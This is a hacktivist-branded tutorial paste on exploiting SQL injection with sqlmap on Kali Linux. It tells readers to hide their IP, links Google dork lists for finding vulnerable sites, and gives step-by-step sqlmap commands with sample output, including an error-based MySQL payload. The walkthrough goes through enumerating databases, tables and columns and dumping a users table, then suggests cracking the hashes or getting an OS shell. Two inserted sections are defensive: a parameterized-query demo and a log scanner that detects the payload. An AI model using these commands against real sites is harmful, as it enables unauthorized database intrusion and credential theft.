CyberdarkKh

#Anonymous -SQLMap on Kali linux

May 29th, 2015
#############################################################
### #Team Cyberdark ( #Operation Freedom Tutorial ) ###
#############################################################

+-------------------------------------------+
Video [ Web Exploitation ] -> + SQL Injection + SQLMap on Kali Linux +
+-------------------------------------------+


First of all, don't forget to protect yourself: that means hiding your real IP address. This link shows how to hide your IP on Kali Linux:
https://youtu.be/Ttn1_WwdZzU


What are Google dork lists?

Google dork lists are search queries used to find websites with SQL injection bugs; you can also feed them to a tool that scans websites for SQL vulnerabilities. In short, a dork is a search term for finding vulnerable websites.
Download the Google dork list from this link: http://pastebin.com/Kxy8pdLL
=============================================================================
>>> SQLMAP on Kali Linux Tutorial <<< Step by step text tutorial


Sqlmap is one of the most popular and powerful SQL injection automation tools out there. Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking, like extracting database names, tables, columns, all the data in the tables, etc. It can even read and write files on the remote file system under certain conditions. Written in Python, it is one of the most powerful hacking tools out there. Sqlmap is the Metasploit of SQL injection.

Sqlmap is included in pen-testing Linux distros like Kali Linux, BackTrack, BackBox, etc. On other distros it can simply be downloaded from the following URL:

http://sqlmap.org/

Since it is written in Python, first you have to install Python on your system. On Ubuntu, install Python from Synaptic. On Windows, install ActiveState Python. Check out this post for details on how to install and run sqlmap on Windows.

For the list of options and parameters that can be used with the sqlmap command, check the sqlmap documentation at
https://github.com/sqlmapproject/sqlmap/wiki/Usage

In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what all can be done with such a tool.

To understand this tutorial you should have thorough knowledge of how database-driven web applications work, for example those made with PHP + MySQL.

Vulnerable URLs

Let's say there is a web application or website that has a URL in it like this:

http://www.site.com/section.php?id=51

and it is prone to SQL injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the URL

http://www.site.com/section.php?id=51'

We just added a single quote to the parameter. If this URL throws an error or reacts in an unexpected manner, then it is clear that the database received the unexpected single quote which the application did not escape properly. So in this case the input parameter "id" is vulnerable to SQL injection.
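
As an added example (not from the original tutorial), here is why the single-quote probe produces a database error and what the fix looks like. An in-memory SQLite table stands in for the PHP + MySQL section.php; the table, the row with id 51 and the function names are constructed for this demo.

```python
# Added example: why the single-quote probe breaks a concatenated query,
# and the parameterized form that does not. SQLite stands in for MySQL.
import sqlite3

def make_db():
    # Constructed stand-in for the site's database: one row with id 51.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sections (id INTEGER, title TEXT)")
    conn.execute("INSERT INTO sections VALUES (51, 'about us')")
    return conn

def lookup_unsafe(conn, raw_id):
    # Mirrors the vulnerable section.php: the raw id from the URL is pasted
    # into the SQL text, so a stray quote changes the statement's syntax.
    sql = "SELECT title FROM sections WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, raw_id):
    # Parameterized query: the driver binds the value and it is never parsed
    # as SQL, so id=51' is just a string that matches no row.
    sql = "SELECT title FROM sections WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()

def probe(lookup, conn, raw_id):
    # What the tester observes: a row count, or the database error that is
    # the "unexpected reaction" described above.
    try:
        return len(lookup(conn, raw_id))
    except sqlite3.Error:
        return "error"

if __name__ == "__main__":
    conn = make_db()
    for raw in ("51", "51'"):
        print(f"id={raw}: unsafe -> {probe(lookup_unsafe, conn, raw)}, "
              f"safe -> {probe(lookup_safe, conn, raw)}")
```

With the concatenated query, id=51' is a syntax error the web server turns into a 500 or a visible MySQL message; the bound version answers both inputs without error, which is what removes the signal the probe relies on.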

Hacking with sqlmap

Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the terminal with the Python interpreter.

python sqlmap.py -u "http://www.site.com/section.php?id=51"

The above is the first and simplest command to run with the sqlmap tool. It checks the input parameters to find out whether they are vulnerable to SQL injection or not. For this, sqlmap sends different kinds of SQL injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system's OS, database name and version. Here is how the output might look:

[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So the sqlmap tool has discovered the operating system, web server and database along with version information. Even this much is pretty impressive. But it's time to move on and see what more this tool is capable of.
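
From the defender's side, as an added example that is not part of the original tutorial: the error-based payload in the output above leaves a distinctive trail in web server access logs. The log lines below are constructed in Apache combined format, with the payload URL-encoded as it would be sent, and the signature patterns and function names are my own.

```python
# Added example: spotting the error-based probe from the output above in
# Apache combined-format access logs. Log lines and patterns are constructed.
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: a normal request, the single-quote probe, and the
# URL-encoded form of the "FLOOR(RAND(0)*2) ... GROUP BY x" payload.
SAMPLE_LOG = r"""
203.0.113.5 - - [29/May/2015:12:10:34 +0000] "GET /section.php?id=51 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/May/2015:12:10:35 +0000] "GET /section.php?id=51%27 HTTP/1.1" 500 312 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [29/May/2015:12:10:37 +0000] "GET /section.php?id=51%20AND%20%28SELECT%201489%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a73776c3a%2C%28SELECT%20%28CASE%20WHEN%20%281489%3D1489%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a76653a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 412 "-" "sqlmap/1.0-dev"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Signatures of the MySQL error-based technique shown in the sqlmap output.
SQLI_PATTERNS = [
    (r"floor\(rand\(0\)\*2\)", "mysql error-based FLOOR/RAND probe"),
    (r"information_schema\.", "information_schema reference"),
    (r"\bgroup\s+by\b", "GROUP BY clause in parameter"),
    (r"^\d+'$", "single-quote probe on numeric parameter"),
]

def analyze_line(line):
    """Return None for a non-combined-format line, else ip/status/findings."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # parse_qsl percent-decodes, so the patterns run on the real payload.
    for name, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
        for pat, label in SQLI_PATTERNS:
            if re.search(pat, value, re.IGNORECASE):
                findings.append(f"{name}: {label}")
    if "sqlmap" in m["ua"].lower():  # sqlmap names itself in its User-Agent by default
        findings.append("user-agent: sqlmap")
    return {"ip": m["ip"], "status": m["status"], "findings": findings}

def scan_log(text):
    """Analyses of every line that produced at least one finding."""
    results = (analyze_line(l) for l in text.strip().splitlines())
    return [r for r in results if r and r["findings"]]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], "; ".join(hit["findings"]))
```

The User-Agent check is the weakest signal since it is trivially changed; the payload patterns and the burst of 500 responses from one client on one parameter are what to alert on.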

Discover Databases

Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs

The output could be something like this:

[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

The output shows the existing databases on the remote system.

Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'safecosmetics'.

Command:

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

and the output can be something similar to this:

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables

Isn't this amazing? It is, of course. Let's get the columns of a particular table now.

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Let's say the table is 'users' and it contains the username and password.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

The output can be something like this:

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+

So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part: extracting the data from the table. The command would be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this:

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

The hash column seems to have the password hash. Try cracking the hash and then you would get the login details right away. sqlmap will create a CSV file containing the dumped data for easy analysis.

So far we have been able to collect a lot of information from the remote database using sqlmap. It's almost like having direct access to the remote database through a client like phpMyAdmin. In real scenarios hackers would try to gain a higher level of access to the system. For this, they would try to crack the password hashes and try to log in through the admin panel. Or they would try to get an OS shell using sqlmap.

I wrote another post on using sqlmap to get more details about remote databases. It explains the other options of sqlmap that are useful to find out the database users, their privileges and their password hashes.